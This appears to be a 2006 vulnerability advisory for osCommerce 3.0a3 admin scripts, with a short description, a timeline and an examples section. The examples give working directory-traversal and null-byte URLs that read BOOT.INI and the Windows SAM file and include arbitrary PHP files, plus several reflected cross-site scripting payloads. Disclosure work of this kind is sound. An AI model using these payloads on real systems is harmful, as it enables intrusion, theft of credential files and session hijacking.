############################################
Oscommerce traversal arbitrary file access
Vendor:http://www.oscommerce.com/about/news,125
Advisore:http://lostmon.blogspot.com/2006/12
/oscommerce-traversal-arbitrary-file.html
Vendor notify:NO Exploit available: YES
###########################################

osCommerce contains a flaw that allows a remote traversal
arbitrary file access.This flaw exists because the application
does not validate filter variable upon submission to
admin/templates_boxes_layout.php script.This could allow a
remote authenticated administrator to create a specially
crafted URL that would execute '../' directory traversal
characters to view files on the target system with
the privileges of the target web service.



####################
versions
####################

Oscommerce 3.0a3


###################
SOLUTION
###################

No solution was available at this time.


################
timeline
################

Discovered:11-11-2006
vendor notify:-----
vendor response:----
disclosure:07-12-2006

#################
Examples
#################

######################
traversal file access
######################

wen we try to open

http://localhost/oscommerce/admin/templates_boxes_layout.php?
set=boxes&filter=[SOME WORD]&lID=27

the aplication returns a full path disclosure and
returns this error:

 Warning: require(includes/templates/[SOME WORD].php) [function.require]:
 failed to open stream: No such file or directory in C:\AppServ\www\
 oscommerce\admin\templates\pages\templates_boxes_layout.php on line 13

Fatal error: require() [function.require]: Failed opening required
'includes/templates/[SOME WORD].php' (include_path='.;C:\php5\pear')
in C:\AppServ\www\oscommerce\admin\templates\pages\templates_
boxes_layout.php on line 13

the aplication add the .php extension to our [SOME WORD] ummm
and it searh for the file in a folder inside webserver
we can include any php file located on the web server
in the aplication and it is executed(local file inclusion)

http://[victim]/admin/templates_boxes_layout.php?
set=boxes&filter=../../our_evil_php_file&lID=27

if we try to read a file outside webserver folder with a non php
extension can try for test this...

&filter=../../../../file.extension%00 for look for example boot.ini
in a windows system

http://localhost/oscommerce/admin/templates_boxes_layout.php?
set=boxes&filter=../../../../BOOT.INI%00&lID=27

http://localhost/oscommerce/admin/templates_boxes_layout.php?
set=content&filter=../../../../windows/repair/sam%00&lID=27

#####################
Cross site scripting
#####################

http://localhost/oscommerce/admin/modules.php?set=shipping
%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

http://localhost/definitiva/admin/customers.php?selected_box=customers
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E

http://localhost/oscommerce/admin/languages_definitions.php?lID=1
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E

http://localhost/oscommerce/admin/products.php?pID=1%22%3E%3CSCRIPT
%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product


######################## €nd #####################

Thnx to Estrella to be my ligth.

-- 
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....